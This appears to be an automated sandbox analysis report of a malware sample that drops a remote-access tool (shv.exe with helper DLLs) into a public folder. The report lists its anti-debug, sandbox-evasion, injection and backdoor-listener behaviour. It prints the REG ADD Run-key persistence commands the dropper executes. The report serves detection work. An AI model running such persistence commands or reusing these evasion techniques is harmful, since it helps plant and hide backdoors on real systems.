Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	9_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	9_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	9_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11112670 IsIconic,GetTickCount,	9_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	9_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\Netstat\shv.exe

6_2_11143570

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1C91F0		6_2_6D1C91F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1D4F30		6_2_6D1D4F30

Delayed program exit found

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110B8200 Sleep,ExitProcess,		6_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110B8200 Sleep,ExitProcess,		9_2_110B8200

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Netstat\shv.exe

Window / User API: threadDelayed 938

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetLocalTime,DecisionNodes

Found evasive API chain checking for process token information

Source: C:\Users\Public\Netstat\shv.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\Public\Netstat\shv.exe	API coverage: 6.2 %
Source: C:\Users\Public\Netstat\shv.exe	API coverage: 2.6 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D4F30

6_2_6D1D4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Netstat\shv.exe TID: 1012

Thread sleep time: -93800s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\Public\Netstat\shv.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6D1D3226h

6_2_6D1D3130

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B16A4 VirtualQuery,GetSystemInfo,

0_2_00007FF70E7B16A4

Source: shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla m*
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: shv.exe, 00000006.00000002.3994135214.000000000127E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995636739.0000000005F06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: shv.exe, 00000009.00000002.2162978734.0000000001490000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000009.00000003.2162115523.000000000148D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: shv.exe, 0000000B.00000003.2263461175.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000D.00000003.2349439155.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000E.00000003.2430757165.00000000010C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF70E7B76D8

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,

6_2_11147750

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Netstat\shv.exe

6_2_11029590

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7C0D20 GetProcessHeap,

0_2_00007FF70E7C0D20

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B76D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3354 SetUnhandledExceptionFilter,	0_2_00007FF70E7B3354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF70E7B2510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B3170
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6D1E28E1
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	9_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	9_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1116DD89

Contains functionality to execute programs as a different user

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,

6_2_110F4560

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\file.exe

0_2_00007FF70E7AB190

Contains functionality to simulate keystroke presses

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,

6_2_1111FCA0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

6_2_1109E190

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

6_2_1109E910

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWnd
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Progman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E79DC70 cpuid

0_2_00007FF70E79DC70

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00007FF70E7AA2CC
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6D1F1DB6
Source: C:\Users\Public\Netstat\shv.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6D1FDC56
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_6D1FDC99
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6D1F1CC1
Source: C:\Users\Public\Netstat\shv.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_6D1F0F39
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6D1F1E5D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_6D1F1EB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_6D1FDB7C
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	9_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	9_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	9_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	9_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	9_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	9_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173CC6

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

6_2_110F33F0

Source: C:\Users\user\Desktop\file.exe

0_2_00007FF70E7B0754

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

6_2_1103B160

Source: C:\Users\Public\Netstat\shv.exe

6_2_11174AE9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E794EB0 GetVersionExW,

0_2_00007FF70E794EB0

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_11070090
